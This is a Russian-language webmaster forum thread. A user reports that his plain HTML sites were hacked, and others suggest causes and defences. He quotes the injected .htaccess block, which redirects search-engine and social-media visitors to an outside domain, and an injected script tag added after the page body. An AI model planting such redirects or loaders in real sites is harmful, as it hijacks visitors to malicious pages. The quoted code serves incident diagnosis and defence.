Форум Сайтостроение Веб-строительство

кто подскажет по взлому...

12
NBSerG
На сайте с 04.09.2010
Offline
134
NBSerG
1183

странная фигня с сайтами некоторыми...

сайты были на чистом штмл даже без джаваскрипт

в корне стоял .htaccess

с содержанием

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.сайт.ru$ [NC]
RewriteRule ^(.*)$ http://сайт.ru/$1 [R=301,L]
AddDefaultCharset windows-1251

и все...

теперь смотрю 


#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://zolotoineta.com/runforestrun [R=301,L]
</IfModule>
#/c3284d#

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.сайт.ru$ [NC]
RewriteRule ^(.*)$ http://сайт.ru/$1 [R=301,L]
AddDefaultCharset windows-1251

а в коды страниц сразу после боди вписана

<!--c3284d--><script type="text/javascript" language="javascript" src="http://сайт.ру/images/ajaxam.js" ></script><!--/c3284d-->

Изготовление сайтов на Joomla (/ru/forum/726795) Такие деньги можно заработать только здесь!!! (http://goo.gl/k1oTJ) Выиграй Porsche Cayenne! (http://goo.gl/RqHaU)
SS
На сайте с 28.05.2008
Offline
154
SmartSEO
#1

И в чем вопрос?

-O-O-
На сайте с 27.05.2006
Offline
140
-O-O-
#2

Вопрос то какой? :)

Раз все на HTML, то менять пароли на ftp и возвращать старый конфиг. Посмотреть на наличие левых папок и файлов.

NBSerG
На сайте с 04.09.2010
Offline
134
NBSerG
#3

вопрос в том как они сумели и как защититься от такого...

и почему из 5 сайтов они выбрали только те что на штмл ведь были и др сайты/папки с движками типа джумлы

-O-O-
На сайте с 27.05.2006
Offline
140
-O-O-
#4
NBSerG:
вопрос в том как они сумели и как защититься от такого...

и почему из 5 сайтов они выбрали только те что на штмл ведь были и др сайты/папки с движками типа джумлы

А Вы уверены, что остальные сайты не заражены другим способом?

Могли и через дырку в джумле поиметь другие сайты.

Защититься - менять пароли, смотреть логи на подозрительную активность, обновлять все что возможно. Могли и хостера поломать.

Взлом? На сайте появилась помогите бан, Платон молчит.. Посторонний код в скриптах
persistent5
На сайте с 23.12.2010
Offline
54
persistent5
#5

Для начала стоит проверить свой ПК

NBSerG
На сайте с 04.09.2010
Offline
134
NBSerG
#6
-O-O-:
А Вы уверены, что остальные сайты не заражены другим способом?
Могли и через дырку в джумле поиметь другие сайты.

Защититься - менять пароли, смотреть логи на подозрительную активность, обновлять все что возможно. Могли и хостера поломать.

да уверен.

не могли

все обновленно

---------- Добавлено 05.07.2012 в 14:08 ----------

persistent5:
Для начала стоит проверить свой ПК

спасибо кЭп

SK
На сайте с 06.02.2007
Offline
51
SkyKiller
#7

Самая первая заплатка для безопасности сайтов - юзать .ftpaccess

BIRTH : Completed successfully. Exit code 0. LIFE : [||||||..............] 37% done. DEATH : Awaiting in system queue...
slaveofmoney
На сайте с 18.08.2008
Offline
131
slaveofmoney
#8

Да не используйте вы ftp есть же ssh, winscp наше все.

пусто )
yanus
На сайте с 21.01.2009
Offline
348
yanus
#9
NBSerG:
вопрос в том как они сумели и как защититься от такого...

и почему из 5 сайтов они выбрали только те что на штмл ведь были и др сайты/папки с движками типа джумлы

Достаточно ломануть один из сайтов, залить шелл. Если права настроены "криво", то можно редактировать файлы на других сайтах.

Собственно ломаные сайты такими пачками и продают.

SK
На сайте с 06.02.2007
Offline
51
SkyKiller
#10
slaveofmoney:
Да не используйте вы ftp есть же ssh, winscp наше все.

Не все хостеры выдают SSH. Есть ещё такие, которые выдают только FTP.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий